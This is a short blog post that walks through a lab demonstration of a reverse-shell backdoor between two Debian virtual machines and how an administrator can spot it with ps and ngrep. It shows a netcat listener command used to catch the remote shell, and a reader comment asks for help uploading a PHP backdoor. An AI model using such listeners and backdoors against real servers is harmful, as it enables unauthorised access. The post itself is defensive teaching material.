playing with a backdoor

I played last night with a backdoor shell that I found on the net and will show you how this works and how you can find traces if you are the system administrator.

I used 2 vm’s (virtual machines), both based on Debian/Linux one called “victim” it simulates the cracked server where the backdoor runs and the other box called “hacky” where the bad guy is sitting in front :)

The first step of the bad guy is to start a server that listens on some port (12345) on his box, a good program for this is netcat, the command could be something like: netcat -l -p 12345

setup

After compiling the backdoor in an executable program on the cracked server (“victim”), the bad guy starts it and sends a shell to his box home.

start the backdoor

Back at the shell of the bad guy we see that the backdoor sends us some information about the box and the banner of the author of the script.

ping from backdoor

The bad guy can now send every command to the cracked server, like “hostname” and he gets the hostname which is “victim” back

send hostname

So what can a system administrator do in this case?

First of all, don’t panic and plug out the computer, a lot of traces could be destroyed after you do that.

A good way is to check the process list, with something like “ps ax” or “ps fax”. As you can see there is the process of the backdoor (marked red)

find backdoor with ps ax

We know now the process ID the port and the IP where the shell is listening. Now it’s time for another great program called ngrep. With ngrep you can sniff network traffic in nearly the same way you can use the normal grep on Linux.
Start ngrep on the port that the backdoor uses.

sniffing with ngrep

The bad guy sends the command “uptime”.

send uptime

And the administrator sees in his ngrep output the “uptime” request also.

ngrep sniffed something

Yes this was a very lucky system administrator, in the real life crackers use encrypted backdoors or rootkit which can hide processes or manipulate commands like ps.

Advertisements

1 comment so far

  1. Dante on

    nice post,

    thnx for your post. but the question is how do we upload smthn like a PHP backdoor using netcat. is it possible? Please give me examples.


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: